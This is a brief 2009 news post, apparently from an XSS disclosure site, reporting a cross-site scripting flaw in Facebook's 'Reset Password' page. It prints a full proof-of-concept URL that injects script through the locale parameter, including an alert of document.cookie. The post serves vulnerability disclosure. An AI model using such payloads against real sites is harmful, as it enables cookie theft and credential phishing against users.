Advertisements

 Facebook's "Reset Password" page suffers major XSS flaw

Written by DP

Saturday, 3 January 2009

Hey you all! Our best wishes for 2009!!! :) ;)

DaiMon has once more discovered a new critical cross-site scripting vulnerability which affects the Facebook "Reset Password" page.

Malicious users can inject code to phish credentials and other sensitive personal information from millions of Facebook members.

We hope that this serious flaw gets fixed quickly as is usually the case with security flaws in Facebook.

XSS:

http://www.facebook.com/reset.php?locale=en_GB%22%3E%3Cscript%3Ealert(1)%3C/script%3E%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Mirror:
http://www.xssed.com/mirror/55951/

Screenshot:



        
Advertisements
Home | News | Articles | Advisories | Submit | Alerts | Links | What is XSS | About | Contact | Some Rights Reserved.